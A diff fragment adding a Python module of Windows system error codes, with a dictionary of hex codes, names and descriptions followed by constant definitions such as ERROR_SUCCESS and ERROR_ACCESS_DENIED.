+ 0x00003abd: ("ERROR_EVT_PUBLISHER_DISABLED", "The publisher has been disabled and its resource is not available. This usually occurs when the publisher is in the process of being uninstalled or upgraded."),
+ 0x00003abe: ("ERROR_EVT_FILTER_OUT_OF_RANGE", "Attempted to create a numeric type that is outside of its valid range."),
+ 0x00003ae8: ("ERROR_EC_SUBSCRIPTION_CANNOT_ACTIVATE", "The subscription fails to activate."),
+ 0x00003ae9: ("ERROR_EC_LOG_DISABLED", "The log of the subscription is in disabled state, and can not be used to forward events to. The log must first be enabled before the subscription can be activated."),
+ 0x00003aea: ("ERROR_EC_CIRCULAR_FORWARDING", "When forwarding events from local machine to itself, the query of the subscription can't contain target log of the subscription."),
+ 0x00003aeb: ("ERROR_EC_CREDSTORE_FULL", "The credential store that is used to save credentials is full."),
+ 0x00003aec: ("ERROR_EC_CRED_NOT_FOUND", "The credential used by this subscription can't be found in credential store."),
+ 0x00003aed: ("ERROR_EC_NO_ACTIVE_CHANNEL", "No active channel is found for the query."),
+ 0x00003afc: ("ERROR_MUI_FILE_NOT_FOUND", "The resource loader failed to find MUI file."),
+ 0x00003afd: ("ERROR_MUI_INVALID_FILE", "The resource loader failed to load MUI file because the file fail to pass validation."),
+ 0x00003afe: ("ERROR_MUI_INVALID_RC_CONFIG", "The RC Manifest is corrupted with garbage data or unsupported version or missing required item."),
+ 0x00003aff: ("ERROR_MUI_INVALID_LOCALE_NAME", "The RC Manifest has invalid culture name."),
+ 0x00003b00: ("ERROR_MUI_INVALID_ULTIMATEFALLBACK_NAME", "The RC Manifest has invalid ultimatefallback name."),
+ 0x00003b01: ("ERROR_MUI_FILE_NOT_LOADED", "The resource loader cache doesn't have loaded MUI entry."),
+ 0x00003b02: ("ERROR_RESOURCE_ENUM_USER_STOP", "User stopped resource enumeration."),
+ 0x00003b03: ("ERROR_MUI_INTLSETTINGS_UILANG_NOT_INSTALLED", "UI language installation failed."),
+ 0x00003b04: ("ERROR_MUI_INTLSETTINGS_INVALID_LOCALE_NAME", "Locale installation failed."),
+ 0x00003b06: ("ERROR_MRM_RUNTIME_NO_DEFAULT_OR_NEUTRAL_RESOURCE", "A resource does not have default or neutral value."),
+ 0x00003b07: ("ERROR_MRM_INVALID_PRICONFIG", "Invalid PRI config file."),
+ 0x00003b08: ("ERROR_MRM_INVALID_FILE_TYPE", "Invalid file type."),
+ 0x00003b09: ("ERROR_MRM_UNKNOWN_QUALIFIER", "Unknown qualifier."),
+ 0x00003b0a: ("ERROR_MRM_INVALID_QUALIFIER_VALUE", "Invalid qualifier value."),
+ 0x00003b0b: ("ERROR_MRM_NO_CANDIDATE", "No Candidate found."),
+ 0x00003b0c: ("ERROR_MRM_NO_MATCH_OR_DEFAULT_CANDIDATE", "The ResourceMap or NamedResource has an item that does not have default or neutral resource.."),
+ 0x00003b0d: ("ERROR_MRM_RESOURCE_TYPE_MISMATCH", "Invalid ResourceCandidate type."),
+ 0x00003b0e: ("ERROR_MRM_DUPLICATE_MAP_NAME", "Duplicate Resource Map."),
+ 0x00003b0f: ("ERROR_MRM_DUPLICATE_ENTRY", "Duplicate Entry."),
+ 0x00003b10: ("ERROR_MRM_INVALID_RESOURCE_IDENTIFIER", "Invalid Resource Identifier."),
+ 0x00003b11: ("ERROR_MRM_FILEPATH_TOO_LONG", "Filepath too long."),
+ 0x00003b12: ("ERROR_MRM_UNSUPPORTED_DIRECTORY_TYPE", "Unsupported directory type."),
+ 0x00003b16: ("ERROR_MRM_INVALID_PRI_FILE", "Invalid PRI File."),
+ 0x00003b17: ("ERROR_MRM_NAMED_RESOURCE_NOT_FOUND", "NamedResource Not Found."),
+ 0x00003b1f: ("ERROR_MRM_MAP_NOT_FOUND", "ResourceMap Not Found."),
+ 0x00003b20: ("ERROR_MRM_UNSUPPORTED_PROFILE_TYPE", "Unsupported MRT profile type."),
+ 0x00003b21: ("ERROR_MRM_INVALID_QUALIFIER_OPERATOR", "Invalid qualifier operator."),
+ 0x00003b22: ("ERROR_MRM_INDETERMINATE_QUALIFIER_VALUE", "Unable to determine qualifier value or qualifier value has not been set."),
+ 0x00003b23: ("ERROR_MRM_AUTOMERGE_ENABLED", "Automerge is enabled in the PRI file."),
+ 0x00003b24: ("ERROR_MRM_TOO_MANY_RESOURCES", "Too many resources defined for package."),
+ 0x00003b60: ("ERROR_MCA_INVALID_CAPABILITIES_STRING", "The monitor returned a DDC/CI capabilities string that did not comply with the ACCESS.bus 3.0, DDC/CI 1.1 or MCCS 2 Revision 1 specification."),
+ 0x00003b61: ("ERROR_MCA_INVALID_VCP_VERSION", "The monitor's VCP Version (0xDF) VCP code returned an invalid version value."),
+ 0x00003b62: ("ERROR_MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION", "The monitor does not comply with the MCCS specification it claims to support."),
+ 0x00003b63: ("ERROR_MCA_MCCS_VERSION_MISMATCH", "The MCCS version in a monitor's mccs_ver capability does not match the MCCS version the monitor reports when the VCP Version (0xDF) VCP code is used."),
+ 0x00003b64: ("ERROR_MCA_UNSUPPORTED_MCCS_VERSION", "The Monitor Configuration API only works with monitors that support the MCCS 1.0 specification, MCCS 2.0 specification or the MCCS 2.0 Revision 1 specification."),
+ 0x00003b65: ("ERROR_MCA_INTERNAL_ERROR", "An internal Monitor Configuration API error occurred."),
+ 0x00003b66: ("ERROR_MCA_INVALID_TECHNOLOGY_TYPE_RETURNED", "The monitor returned an invalid monitor technology type. CRT, Plasma and LCD (TFT) are examples of monitor technology types. This error implies that the monitor violated the MCCS 2.0 or MCCS 2.0 Revision 1 specification."),
+ 0x00003b67: ("ERROR_MCA_UNSUPPORTED_COLOR_TEMPERATURE", "The caller of SetMonitorColorTemperature specified a color temperature that the current monitor did not support. This error implies that the monitor violated the MCCS 2.0 or MCCS 2.0 Revision 1 specification."),
+ 0x00003b92: ("ERROR_AMBIGUOUS_SYSTEM_DEVICE", "The requested system device cannot be identified due to multiple indistinguishable devices potentially matching the identification criteria."),
+ 0x00003bc3: ("ERROR_SYSTEM_DEVICE_NOT_FOUND", "The requested system device cannot be found."),
+ 0x00003bc4: ("ERROR_HASH_NOT_SUPPORTED", "Hash generation for the specified hash version and hash type is not enabled on the server."),
+ 0x00003bc5: ("ERROR_HASH_NOT_PRESENT", "The hash requested from the server is not available or no longer valid."),
+ 0x00003bd9: ("ERROR_SECONDARY_IC_PROVIDER_NOT_REGISTERED", "The secondary interrupt controller instance that manages the specified interrupt is not registered."),
+ 0x00003bda: ("ERROR_GPIO_CLIENT_INFORMATION_INVALID", "The information supplied by the GPIO client driver is invalid."),
+ 0x00003bdb: ("ERROR_GPIO_VERSION_NOT_SUPPORTED", "The version specified by the GPIO client driver is not supported."),
+ 0x00003bdc: ("ERROR_GPIO_INVALID_REGISTRATION_PACKET", "The registration packet supplied by the GPIO client driver is not valid."),
+ 0x00003bdd: ("ERROR_GPIO_OPERATION_DENIED", "The requested operation is not supported for the specified handle."),
+ 0x00003bde: ("ERROR_GPIO_INCOMPATIBLE_CONNECT_MODE", "The requested connect mode conflicts with an existing mode on one or more of the specified pins."),
+ 0x00003bdf: ("ERROR_GPIO_INTERRUPT_ALREADY_UNMASKED", "The interrupt requested to be unmasked is not masked."),
+ 0x00003c28: ("ERROR_CANNOT_SWITCH_RUNLEVEL", "The requested run level switch cannot be completed successfully."),
+ 0x00003c29: ("ERROR_INVALID_RUNLEVEL_SETTING", "The service has an invalid run level setting. The run level for a service"),
+ 0x00003c2a: ("ERROR_RUNLEVEL_SWITCH_TIMEOUT", "The requested run level switch cannot be completed successfully since"),
+ 0x00003c2b: ("ERROR_RUNLEVEL_SWITCH_AGENT_TIMEOUT", "A run level switch agent did not respond within the specified timeout."),
+ 0x00003c2c: ("ERROR_RUNLEVEL_SWITCH_IN_PROGRESS", "A run level switch is currently in progress."),
+ 0x00003c2d: ("ERROR_SERVICES_FAILED_AUTOSTART", "One or more services failed to start during the service startup phase of a run level switch."),
+ 0x00003c8d: ("ERROR_COM_TASK_STOP_PENDING", "The task stop request cannot be completed immediately since"),
+ 0x00003cf0: ("ERROR_INSTALL_OPEN_PACKAGE_FAILED", "Package could not be opened."),
+ 0x00003cf1: ("ERROR_INSTALL_PACKAGE_NOT_FOUND", "Package was not found."),
+ 0x00003cf2: ("ERROR_INSTALL_INVALID_PACKAGE", "Package data is invalid."),
+ 0x00003cf3: ("ERROR_INSTALL_RESOLVE_DEPENDENCY_FAILED", "Package failed updates, dependency or conflict validation."),
+ 0x00003cf4: ("ERROR_INSTALL_OUT_OF_DISK_SPACE", "There is not enough disk space on your computer. Please free up some space and try again."),
+ 0x00003cf5: ("ERROR_INSTALL_NETWORK_FAILURE", "There was a problem downloading your product."),
+ 0x00003cf6: ("ERROR_INSTALL_REGISTRATION_FAILURE", "Package could not be registered."),
+ 0x00003cf7: ("ERROR_INSTALL_DEREGISTRATION_FAILURE", "Package could not be unregistered."),
+ 0x00003cf8: ("ERROR_INSTALL_CANCEL", "User cancelled the install request."),
+ 0x00003cf9: ("ERROR_INSTALL_FAILED", "Install failed. Please contact your software vendor."),
+ 0x00003cfa: ("ERROR_REMOVE_FAILED", "Removal failed. Please contact your software vendor."),
+ 0x00003cfb: ("ERROR_PACKAGE_ALREADY_EXISTS", "The provided package is already installed, and reinstallation of the package was blocked. Check the AppXDeployment-Server event log for details."),
+ 0x00003cfc: ("ERROR_NEEDS_REMEDIATION", "The application cannot be started. Try reinstalling the application to fix the problem."),
+ 0x00003cfd: ("ERROR_INSTALL_PREREQUISITE_FAILED", "A Prerequisite for an install could not be satisfied."),
+ 0x00003cfe: ("ERROR_PACKAGE_REPOSITORY_CORRUPTED", "The package repository is corrupted."),
+ 0x00003cff: ("ERROR_INSTALL_POLICY_FAILURE", "To install this application you need either a Windows developer license or a sideloading-enabled system."),
+ 0x00003d00: ("ERROR_PACKAGE_UPDATING", "The application cannot be started because it is currently updating."),
+ 0x00003d01: ("ERROR_DEPLOYMENT_BLOCKED_BY_POLICY", "The package deployment operation is blocked by policy. Please contact your system administrator."),
+ 0x00003d02: ("ERROR_PACKAGES_IN_USE", "The package could not be installed because resources it modifies are currently in use."),
+ 0x00003d03: ("ERROR_RECOVERY_FILE_CORRUPT", "The package could not be recovered because necessary data for recovery have been corrupted."),
+ 0x00003d04: ("ERROR_INVALID_STAGED_SIGNATURE", "The signature is invalid. To register in developer mode, AppxSignature.p7x and AppxBlockMap.xml must be valid or should not be present."),
+ 0x00003d05: ("ERROR_DELETING_EXISTING_APPLICATIONDATA_STORE_FAILED", "An error occurred while deleting the package's previously existing application data."),
+ 0x00003d06: ("ERROR_INSTALL_PACKAGE_DOWNGRADE", "The package could not be installed because a higher version of this package is already installed."),
+ 0x00003d07: ("ERROR_SYSTEM_NEEDS_REMEDIATION", "An error in a system binary was detected. Try refreshing the PC to fix the problem."),
+ 0x00003d08: ("ERROR_APPX_INTEGRITY_FAILURE_CLR_NGEN", "A corrupted CLR NGEN binary was detected on the system."),
+ 0x00003d09: ("ERROR_RESILIENCY_FILE_CORRUPT", "The operation could not be resumed because necessary data for recovery have been corrupted."),
+ 0x00003d0a: ("ERROR_INSTALL_FIREWALL_SERVICE_NOT_RUNNING", "The package could not be installed because the Windows Firewall service is not running. Enable the Windows Firewall service and try again."),
+ 0x00003d54: ("APPMODEL_ERROR_NO_PACKAGE", "The process has no package identity."),
+ 0x00003d55: ("APPMODEL_ERROR_PACKAGE_RUNTIME_CORRUPT", "The package runtime information is corrupted."),
+ 0x00003d56: ("APPMODEL_ERROR_PACKAGE_IDENTITY_CORRUPT", "The package identity is corrupted."),
+ 0x00003d57: ("APPMODEL_ERROR_NO_APPLICATION", "The process has no application identity."),
+ 0x00003db8: ("ERROR_STATE_LOAD_STORE_FAILED", "Loading the state store failed."),
+ 0x00003db9: ("ERROR_STATE_GET_VERSION_FAILED", "Retrieving the state version for the application failed."),
+ 0x00003dba: ("ERROR_STATE_SET_VERSION_FAILED", "Setting the state version for the application failed."),
+ 0x00003dbb: ("ERROR_STATE_STRUCTURED_RESET_FAILED", "Resetting the structured state of the application failed."),
+ 0x00003dbc: ("ERROR_STATE_OPEN_CONTAINER_FAILED", "State Manager failed to open the container."),
+ 0x00003dbd: ("ERROR_STATE_CREATE_CONTAINER_FAILED", "State Manager failed to create the container."),
+ 0x00003dbe: ("ERROR_STATE_DELETE_CONTAINER_FAILED", "State Manager failed to delete the container."),
+ 0x00003dbf: ("ERROR_STATE_READ_SETTING_FAILED", "State Manager failed to read the setting."),
+ 0x00003dc0: ("ERROR_STATE_WRITE_SETTING_FAILED", "State Manager failed to write the setting."),
+ 0x00003dc1: ("ERROR_STATE_DELETE_SETTING_FAILED", "State Manager failed to delete the setting."),
+ 0x00003dc2: ("ERROR_STATE_QUERY_SETTING_FAILED", "State Manager failed to query the setting."),
+ 0x00003dc3: ("ERROR_STATE_READ_COMPOSITE_SETTING_FAILED", "State Manager failed to read the composite setting."),
+ 0x00003dc4: ("ERROR_STATE_WRITE_COMPOSITE_SETTING_FAILED", "State Manager failed to write the composite setting."),
+ 0x00003dc5: ("ERROR_STATE_ENUMERATE_CONTAINER_FAILED", "State Manager failed to enumerate the containers."),
+ 0x00003dc6: ("ERROR_STATE_ENUMERATE_SETTINGS_FAILED", "State Manager failed to enumerate the settings."),
+ 0x00003dc7: ("ERROR_STATE_COMPOSITE_SETTING_VALUE_SIZE_LIMIT_EXCEEDED", "The size of the state manager composite setting value has exceeded the limit."),
+ 0x00003dc8: ("ERROR_STATE_SETTING_VALUE_SIZE_LIMIT_EXCEEDED", "The size of the state manager setting value has exceeded the limit."),
+ 0x00003dc9: ("ERROR_STATE_SETTING_NAME_SIZE_LIMIT_EXCEEDED", "The length of the state manager setting name has exceeded the limit."),
+ 0x00003dca: ("ERROR_STATE_CONTAINER_NAME_SIZE_LIMIT_EXCEEDED", "The length of the state manager container name has exceeded the limit."),
+ 0x00003de1: ("ERROR_API_UNAVAILABLE", "This API cannot be used in the context of the caller's application type."),
+ 0x00003df5: ("STORE_ERROR_UNLICENSED", "This PC does not have a valid license for the application or product."),
+ 0x00003df6: ("STORE_ERROR_UNLICENSED_USER", "The authenticated user does not have a valid license for the application or product."),
+}
+
+
+# Error Codes
+
+ERROR_SUCCESS = 0x00000000
+ERROR_INVALID_FUNCTION = 0x00000001
+ERROR_FILE_NOT_FOUND = 0x00000002
+ERROR_PATH_NOT_FOUND = 0x00000003
+ERROR_TOO_MANY_OPEN_FILES = 0x00000004
+ERROR_ACCESS_DENIED = 0x00000005
+ERROR_INVALID_HANDLE = 0x00000006
+ERROR_ARENA_TRASHED = 0x00000007
+ERROR_NOT_ENOUGH_MEMORY = 0x00000008
+ERROR_INVALID_BLOCK = 0x00000009
+ERROR_BAD_ENVIRONMENT = 0x0000000a
+ERROR_BAD_FORMAT = 0x0000000b
+ERROR_INVALID_ACCESS = 0x0000000c
+ERROR_INVALID_DATA = 0x0000000d
+ERROR_OUTOFMEMORY = 0x0000000e
+ERROR_INVALID_DRIVE = 0x0000000f
+ERROR_CURRENT_DIRECTORY = 0x00000010
+ERROR_NOT_SAME_DEVICE = 0x00000011
+ERROR_NO_MORE_FILES = 0x00000012
+ERROR_WRITE_PROTECT = 0x00000013
+ERROR_BAD_UNIT = 0x00000014
+ERROR_NOT_READY = 0x00000015
+ERROR_BAD_COMMAND = 0x00000016
+ERROR_CRC = 0x00000017
+ERROR_BAD_LENGTH = 0x00000018
+ERROR_SEEK = 0x00000019
+ERROR_NOT_DOS_DISK = 0x0000001a
+ERROR_SECTOR_NOT_FOUND = 0x0000001b
+ERROR_OUT_OF_PAPER = 0x0000001c
+ERROR_WRITE_FAULT = 0x0000001d
+ERROR_READ_FAULT = 0x0000001e
+ERROR_GEN_FAILURE = 0x0000001f
+ERROR_SHARING_VIOLATION = 0x00000020
+ERROR_LOCK_VIOLATION = 0x00000021
+ERROR_WRONG_DISK = 0x00000022
+ERROR_SHARING_BUFFER_EXCEEDED = 0x00000024
+ERROR_HANDLE_EOF = 0x00000026
+ERROR_HANDLE_DISK_FULL = 0x00000027
+ERROR_NOT_SUPPORTED = 0x00000032
+ERROR_REM_NOT_LIST = 0x00000033
+ERROR_DUP_NAME = 0x00000034
+ERROR_BAD_NETPATH = 0x00000035
+ERROR_NETWORK_BUSY = 0x00000036
+ERROR_DEV_NOT_EXIST = 0x00000037
+ERROR_TOO_MANY_CMDS = 0x00000038
+ERROR_ADAP_HDW_ERR = 0x00000039
+ERROR_BAD_NET_RESP = 0x0000003a
+ERROR_UNEXP_NET_ERR = 0x0000003b
+ERROR_BAD_REM_ADAP = 0x0000003c
+ERROR_PRINTQ_FULL = 0x0000003d
+ERROR_NO_SPOOL_SPACE = 0x0000003e
+ERROR_PRINT_CANCELLED = 0x0000003f
+ERROR_NETNAME_DELETED = 0x00000040
+ERROR_NETWORK_ACCESS_DENIED = 0x00000041
+ERROR_BAD_DEV_TYPE = 0x00000042
+ERROR_BAD_NET_NAME = 0x00000043
+ERROR_TOO_MANY_NAMES = 0x00000044
+ERROR_TOO_MANY_SESS = 0x00000045
+ERROR_SHARING_PAUSED = 0x00000046
+ERROR_REQ_NOT_ACCEP = 0x00000047
+ERROR_REDIR_PAUSED = 0x00000048
+ERROR_FILE_EXISTS = 0x00000050
+ERROR_CANNOT_MAKE = 0x00000052
+ERROR_FAIL_I24 = 0x00000053
+ERROR_OUT_OF_STRUCTURES = 0x00000054
+ERROR_ALREADY_ASSIGNED = 0x00000055
+ERROR_INVALID_PASSWORD = 0x00000056
+ERROR_INVALID_PARAMETER = 0x00000057
+ERROR_NET_WRITE_FAULT = 0x00000058
+ERROR_NO_PROC_SLOTS = 0x00000059
+ERROR_TOO_MANY_SEMAPHORES = 0x00000064
+ERROR_EXCL_SEM_ALREADY_OWNED = 0x00000065
+ERROR_SEM_IS_SET = 0x00000066
+ERROR_TOO_MANY_SEM_REQUESTS = 0x00000067
+ERROR_INVALID_AT_INTERRUPT_TIME = 0x00000068
+ERROR_SEM_OWNER_DIED = 0x00000069
+ERROR_SEM_USER_LIMIT = 0x0000006a
+ERROR_DISK_CHANGE = 0x0000006b
+ERROR_DRIVE_LOCKED = 0x0000006c
+ERROR_BROKEN_PIPE = 0x0000006d
+ERROR_OPEN_FAILED = 0x0000006e
+ERROR_BUFFER_OVERFLOW = 0x0000006f
+ERROR_DISK_FULL = 0x00000070
+ERROR_NO_MORE_SEARCH_HANDLES = 0x00000071
+ERROR_INVALID_TARGET_HANDLE = 0x00000072
+ERROR_INVALID_CATEGORY = 0x00000075
+ERROR_INVALID_VERIFY_SWITCH = 0x00000076
+ERROR_BAD_DRIVER_LEVEL = 0x00000077
+ERROR_CALL_NOT_IMPLEMENTED = 0x00000078
+ERROR_SEM_TIMEOUT = 0x00000079
+ERROR_INSUFFICIENT_BUFFER = 0x0000007a
+ERROR_INVALID_NAME = 0x0000007b
+ERROR_INVALID_LEVEL = 0x0000007c
+ERROR_NO_VOLUME_LABEL = 0x0000007d
+ERROR_MOD_NOT_FOUND = 0x0000007e
+ERROR_PROC_NOT_FOUND = 0x0000007f
+ERROR_WAIT_NO_CHILDREN = 0x00000080
+ERROR_CHILD_NOT_COMPLETE = 0x00000081
+ERROR_DIRECT_ACCESS_HANDLE = 0x00000082
+ERROR_NEGATIVE_SEEK = 0x00000083
+ERROR_SEEK_ON_DEVICE = 0x00000084
+ERROR_IS_JOIN_TARGET = 0x00000085
+ERROR_IS_JOINED = 0x00000086
+ERROR_IS_SUBSTED = 0x00000087
+ERROR_NOT_JOINED = 0x00000088
+ERROR_NOT_SUBSTED = 0x00000089
+ERROR_JOIN_TO_JOIN = 0x0000008a
+ERROR_SUBST_TO_SUBST = 0x0000008b
+ERROR_JOIN_TO_SUBST = 0x0000008c
+ERROR_SUBST_TO_JOIN = 0x0000008d
+ERROR_BUSY_DRIVE = 0x0000008e
+ERROR_SAME_DRIVE = 0x0000008f
+ERROR_DIR_NOT_ROOT = 0x00000090
+ERROR_DIR_NOT_EMPTY = 0x00000091
+ERROR_IS_SUBST_PATH = 0x00000092
+ERROR_IS_JOIN_PATH = 0x00000093
+ERROR_PATH_BUSY = 0x00000094
+ERROR_IS_SUBST_TARGET = 0x00000095
+ERROR_SYSTEM_TRACE = 0x00000096
+ERROR_INVALID_EVENT_COUNT = 0x00000097
+ERROR_TOO_MANY_MUXWAITERS = 0x00000098
+ERROR_INVALID_LIST_FORMAT = 0x00000099
+ERROR_LABEL_TOO_LONG = 0x0000009a
+ERROR_TOO_MANY_TCBS = 0x0000009b
+ERROR_SIGNAL_REFUSED = 0x0000009c
+ERROR_DISCARDED = 0x0000009d
+ERROR_NOT_LOCKED = 0x0000009e
+ERROR_BAD_THREADID_ADDR = 0x0000009f
+ERROR_BAD_ARGUMENTS = 0x000000a0
+ERROR_BAD_PATHNAME = 0x000000a1
+ERROR_SIGNAL_PENDING = 0x000000a2
+ERROR_MAX_THRDS_REACHED = 0x000000a4
+ERROR_LOCK_FAILED = 0x000000a7
+ERROR_BUSY = 0x000000aa
+ERROR_DEVICE_SUPPORT_IN_PROGRESS = 0x000000ab
+ERROR_CANCEL_VIOLATION = 0x000000ad
+ERROR_ATOMIC_LOCKS_NOT_SUPPORTED = 0x000000ae
+ERROR_INVALID_SEGMENT_NUMBER = 0x000000b4
+ERROR_INVALID_ORDINAL = 0x000000b6
+ERROR_ALREADY_EXISTS = 0x000000b7
+ERROR_INVALID_FLAG_NUMBER = 0x000000ba
+ERROR_SEM_NOT_FOUND = 0x000000bb
+ERROR_INVALID_STARTING_CODESEG = 0x000000bc
+ERROR_INVALID_STACKSEG = 0x000000bd
+ERROR_INVALID_MODULETYPE = 0x000000be
+ERROR_INVALID_EXE_SIGNATURE = 0x000000bf
+ERROR_EXE_MARKED_INVALID = 0x000000c0
+ERROR_BAD_EXE_FORMAT = 0x000000c1
+ERROR_ITERATED_DATA_EXCEEDS_64k = 0x000000c2
+ERROR_INVALID_MINALLOCSIZE = 0x000000c3
+ERROR_DYNLINK_FROM_INVALID_RING = 0x000000c4
+ERROR_IOPL_NOT_ENABLED = 0x000000c5
+ERROR_INVALID_SEGDPL = 0x000000c6
+ERROR_AUTODATASEG_EXCEEDS_64k = 0x000000c7
+ERROR_RING2SEG_MUST_BE_MOVABLE = 0x000000c8
+ERROR_RELOC_CHAIN_XEEDS_SEGLIM = 0x000000c9
+ERROR_INFLOOP_IN_RELOC_CHAIN = 0x000000ca
+ERROR_ENVVAR_NOT_FOUND = 0x000000cb
+ERROR_NO_SIGNAL_SENT = 0x000000cd
+ERROR_FILENAME_EXCED_RANGE = 0x000000ce
+ERROR_RING2_STACK_IN_USE = 0x000000cf
+ERROR_META_EXPANSION_TOO_LONG = 0x000000d0
+ERROR_INVALID_SIGNAL_NUMBER = 0x000000d1
+ERROR_THREAD_1_INACTIVE = 0x000000d2
+ERROR_LOCKED = 0x000000d4
+ERROR_TOO_MANY_MODULES = 0x000000d6
+ERROR_NESTING_NOT_ALLOWED = 0x000000d7
+ERROR_EXE_MACHINE_TYPE_MISMATCH = 0x000000d8
+ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY = 0x000000d9
+ERROR_EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY = 0x000000da
+ERROR_FILE_CHECKED_OUT = 0x000000dc
+ERROR_CHECKOUT_REQUIRED = 0x000000dd
+ERROR_BAD_FILE_TYPE = 0x000000de
+ERROR_FILE_TOO_LARGE = 0x000000df
+ERROR_FORMS_AUTH_REQUIRED = 0x000000e0
+ERROR_VIRUS_INFECTED = 0x000000e1
+ERROR_VIRUS_DELETED = 0x000000e2
+ERROR_PIPE_LOCAL = 0x000000e5
+ERROR_BAD_PIPE = 0x000000e6
+ERROR_PIPE_BUSY = 0x000000e7
+ERROR_NO_DATA = 0x000000e8
+ERROR_PIPE_NOT_CONNECTED = 0x000000e9
+ERROR_MORE_DATA = 0x000000ea
+ERROR_VC_DISCONNECTED = 0x000000f0
+ERROR_INVALID_EA_NAME = 0x000000fe
+ERROR_EA_LIST_INCONSISTENT = 0x000000ff
+WAIT_TIMEOUT = 0x00000102
+ERROR_NO_MORE_ITEMS = 0x00000103
+ERROR_CANNOT_COPY = 0x0000010a
+ERROR_DIRECTORY = 0x0000010b
+ERROR_EAS_DIDNT_FIT = 0x00000113
+ERROR_EA_FILE_CORRUPT = 0x00000114
+ERROR_EA_TABLE_FULL = 0x00000115
+ERROR_INVALID_EA_HANDLE = 0x00000116
+ERROR_EAS_NOT_SUPPORTED = 0x0000011a
+ERROR_NOT_OWNER = 0x00000120
+ERROR_TOO_MANY_POSTS = 0x0000012a
+ERROR_PARTIAL_COPY = 0x0000012b
+ERROR_OPLOCK_NOT_GRANTED = 0x0000012c
+ERROR_INVALID_OPLOCK_PROTOCOL = 0x0000012d
+ERROR_DISK_TOO_FRAGMENTED = 0x0000012e
+ERROR_DELETE_PENDING = 0x0000012f
+ERROR_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0x00000130
+ERROR_SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0x00000131
+ERROR_SECURITY_STREAM_IS_INCONSISTENT = 0x00000132
+ERROR_INVALID_LOCK_RANGE = 0x00000133
+ERROR_IMAGE_SUBSYSTEM_NOT_PRESENT = 0x00000134
+ERROR_NOTIFICATION_GUID_ALREADY_DEFINED = 0x00000135
+ERROR_INVALID_EXCEPTION_HANDLER = 0x00000136
+ERROR_DUPLICATE_PRIVILEGES = 0x00000137
+ERROR_NO_RANGES_PROCESSED = 0x00000138
+ERROR_NOT_ALLOWED_ON_SYSTEM_FILE = 0x00000139
+ERROR_DISK_RESOURCES_EXHAUSTED = 0x0000013a
+ERROR_INVALID_TOKEN = 0x0000013b
+ERROR_DEVICE_FEATURE_NOT_SUPPORTED = 0x0000013c
+ERROR_MR_MID_NOT_FOUND = 0x0000013d
+ERROR_SCOPE_NOT_FOUND = 0x0000013e
+ERROR_UNDEFINED_SCOPE = 0x0000013f
+ERROR_INVALID_CAP = 0x00000140
+ERROR_DEVICE_UNREACHABLE = 0x00000141
+ERROR_DEVICE_NO_RESOURCES = 0x00000142
+ERROR_DATA_CHECKSUM_ERROR = 0x00000143
+ERROR_INTERMIXED_KERNEL_EA_OPERATION = 0x00000144
+ERROR_FILE_LEVEL_TRIM_NOT_SUPPORTED = 0x00000146
+ERROR_OFFSET_ALIGNMENT_VIOLATION = 0x00000147
+ERROR_INVALID_FIELD_IN_PARAMETER_LIST = 0x00000148
+ERROR_OPERATION_IN_PROGRESS = 0x00000149
+ERROR_BAD_DEVICE_PATH = 0x0000014a
+ERROR_TOO_MANY_DESCRIPTORS = 0x0000014b
+ERROR_SCRUB_DATA_DISABLED = 0x0000014c
+ERROR_NOT_REDUNDANT_STORAGE = 0x0000014d
+ERROR_RESIDENT_FILE_NOT_SUPPORTED = 0x0000014e
+ERROR_COMPRESSED_FILE_NOT_SUPPORTED = 0x0000014f
+ERROR_DIRECTORY_NOT_SUPPORTED = 0x00000150
+ERROR_NOT_READ_FROM_COPY = 0x00000151
+ERROR_FT_WRITE_FAILURE = 0x00000152
+ERROR_FT_DI_SCAN_REQUIRED = 0x00000153
+ERROR_INVALID_KERNEL_INFO_VERSION = 0x00000154
+ERROR_INVALID_PEP_INFO_VERSION = 0x00000155
+ERROR_FAIL_NOACTION_REBOOT = 0x0000015e
+ERROR_FAIL_SHUTDOWN = 0x0000015f
+ERROR_FAIL_RESTART = 0x00000160
+ERROR_MAX_SESSIONS_REACHED = 0x00000161
+ERROR_THREAD_MODE_ALREADY_BACKGROUND = 0x00000190
+ERROR_THREAD_MODE_NOT_BACKGROUND = 0x00000191
+ERROR_PROCESS_MODE_ALREADY_BACKGROUND = 0x00000192
+ERROR_PROCESS_MODE_NOT_BACKGROUND = 0x00000193
+ERROR_INVALID_ADDRESS = 0x000001e7
+ERROR_USER_PROFILE_LOAD = 0x000001f4
+ERROR_ARITHMETIC_OVERFLOW = 0x00000216
+ERROR_PIPE_CONNECTED = 0x00000217
+ERROR_PIPE_LISTENING = 0x00000218
+ERROR_VERIFIER_STOP = 0x00000219
+ERROR_ABIOS_ERROR = 0x0000021a
+ERROR_WX86_WARNING = 0x0000021b
+ERROR_WX86_ERROR = 0x0000021c
+ERROR_TIMER_NOT_CANCELED = 0x0000021d
+ERROR_UNWIND = 0x0000021e
+ERROR_BAD_STACK = 0x0000021f
+ERROR_INVALID_UNWIND_TARGET = 0x00000220
+ERROR_INVALID_PORT_ATTRIBUTES = 0x00000221
+ERROR_PORT_MESSAGE_TOO_LONG = 0x00000222
+ERROR_INVALID_QUOTA_LOWER = 0x00000223
+ERROR_DEVICE_ALREADY_ATTACHED = 0x00000224
+ERROR_INSTRUCTION_MISALIGNMENT = 0x00000225
+ERROR_PROFILING_NOT_STARTED = 0x00000226
+ERROR_PROFILING_NOT_STOPPED = 0x00000227
+ERROR_COULD_NOT_INTERPRET = 0x00000228
+ERROR_PROFILING_AT_LIMIT = 0x00000229
+ERROR_CANT_WAIT = 0x0000022a
+ERROR_CANT_TERMINATE_SELF = 0x0000022b
+ERROR_UNEXPECTED_MM_CREATE_ERR = 0x0000022c
+ERROR_UNEXPECTED_MM_MAP_ERROR = 0x0000022d
+ERROR_UNEXPECTED_MM_EXTEND_ERR = 0x0000022e
+ERROR_BAD_FUNCTION_TABLE = 0x0000022f
+ERROR_NO_GUID_TRANSLATION = 0x00000230
+ERROR_INVALID_LDT_SIZE = 0x00000231
+ERROR_INVALID_LDT_OFFSET = 0x00000233
+ERROR_INVALID_LDT_DESCRIPTOR = 0x00000234
+ERROR_TOO_MANY_THREADS = 0x00000235
+ERROR_THREAD_NOT_IN_PROCESS = 0x00000236
